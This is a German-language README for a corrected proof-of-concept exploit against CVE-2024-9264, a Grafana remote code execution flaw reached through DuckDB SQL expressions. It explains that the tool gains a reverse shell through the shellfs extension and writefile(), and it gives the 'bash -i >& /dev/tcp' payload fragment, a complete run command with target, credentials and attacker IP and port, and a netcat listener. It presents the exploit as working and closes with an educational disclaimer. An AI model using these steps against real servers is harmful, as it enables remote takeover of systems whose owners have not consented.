
Korrigierter Proof-of-Concept-Exploit für CVE-2024-9264, eine kritische Grafana RCE über DuckDB SQL-Ausdrücke. Führt eine Reverse-Shell unter Verwendung der korrigierten shellfs-Erweiterung und der writefile()-Funktion aus.
Dies ist eine korrigierte Version des Proof-of-Concept-Exploits für CVE-2024-9264, eine kritische Remote-Code-Ausführung-Sicherheitslücke in Grafana (über SQL-Ausdrücke und DuckDB).
🔗 Ursprüngliche Meldung: Grafana Security Release
❌ Ursprünglicher PoC: Defekt aufgrund von Syntaxfehlern und fehlerhafter Verwendung von write_file()
✅ Diese Version funktioniert und wurde auf einer anfälligen Grafana 11.0.0-Instanz getestet.
writefile() anstelle von write_file() (DuckDB-Funktion)bash -i >& /dev/tcp/...shellfs-Erweiterung geschrieben und ausgeführtinstall shellfs from community auszuführenpython3 fixed_poc_writefile.py \
--url http://target:3000 \
--username admin \
--password admin \
--reverse-ip <YOUR_IP> \
--reverse-port 4444
Dann lauschen Sie mit:
nc -lvnp 4444
Dieses Projekt dient ausschließlich zu Bildungszwecken.
Verwenden Sie es nicht gegen Ziele, für die Sie keine Testberechtigung haben.
Modifiziert und validiert von Exerr — ursprünglicher PoC von z3k0sec.